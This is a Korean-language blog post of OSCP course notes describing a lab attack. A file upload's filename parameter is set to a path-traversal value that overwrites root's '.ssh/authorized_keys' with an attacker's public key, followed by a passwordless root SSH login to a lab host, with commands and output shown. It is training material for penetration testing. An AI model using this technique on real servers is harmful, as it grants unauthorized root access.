OSCP - 9.3.2. Using Non-Executable Files

728x90

파일 업로드 시 실행이 불가능한 경우(e.g. 실행 권한이 없는 업로드 폴더)에 사용할 수 있는 취약점 분석 방법을 알아본다.

우선 파일 업로드 시 filename에 매개변수를 조작하여 ../../../../../../../test.txt를 넣어 서버로 전달한 경우 서버 측이 정상 응답을 한 경우 취약 가능성이 있을 수 있다. 특히 여기에 루트(/) 경로임에도 정상 업로드 된 것이라면 root의 홈디렉터리도 직접 접근이 가능함을 알 수 있다.

kali@kali:~$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): fileup
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in fileup
Your public key has been saved in fileup.pub
...

kali@kali:~$ cat fileup.pub > authorized_keys

이제 칼리에서 ssh 키 쌍을 직접 만들어 준다.

fileup은 비공개 키이고

fileup.pub(authorized_keys)는 공개 키이다.

서버에게 업로드될 키는 authorized_keys 즉 공개키이다.

방금 전 filename 매개변수를 조작한 것 처럼 이번에는 ../../../../../../../../root/.ssh/authorized_keys를 넣어서 루트의 홈디렉터리/.ssh/authorized_keys를 덮어쓰게 만든다.

kali@kali:~$ rm ~/.ssh/known_hosts

kali@kali:~$ ssh -p 2222 -i fileup root@mountaindesserts.com
The authenticity of host '[mountaindesserts.com]:2222 ([192.168.50.16]:2222)' can't be established.
ED25519 key fingerprint is SHA256:R2JQNI3WJqpEehY2Iv9QdlMAoeB3jnPvjJqqfDZ3IXU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
...
root@76b77a6eae51:~#

이후 비공개 키(fileup)로 대상 서버의 ssh 서버로 로그인을 시도하면 패스워드 없이도 바로 로그인이 되는 것을 확인할 수 있다.

지금은 root 디렉터리도 접근 가능하다는 전재하에 이루어져 쉽게 공격에 성공하였지만, 실제로는 접근 권한이 되어 있기 때문에 좀 더 작업 과정이 필요할 수도 있다. 하지만 이러한 방식을 활용해 상상력을 발휘한다면 또 다른 공격들도 충분히 가능할 것이라고 생각이 든다.

728x90

'🏴CTF > OSCP' 카테고리의 다른 글

OSCP - 9.2.2. PHP Wrappers (0)	2025.07.21
OSCP - 9.2. File Inclusion Vulnerabilities, Labs Local File Inclusion (LFI) 및 access.log 포이즈닝 취약점 (1)	2025.07.21
OSCP - 9.1. Directory Traversal, Labs CVE-2021-43 --path-as-is 취약점 (0)	2025.07.21

HackLog

OSCP - 9.3.2. Using Non-Executable Files

'🏴CTF > OSCP' 카테고리의 다른 글

티스토리툴바

OSCP - 9.3.2. Using Non-Executable Files

'🏴CTF > OSCP' 카테고리의 다른 글

관련글

티스토리툴바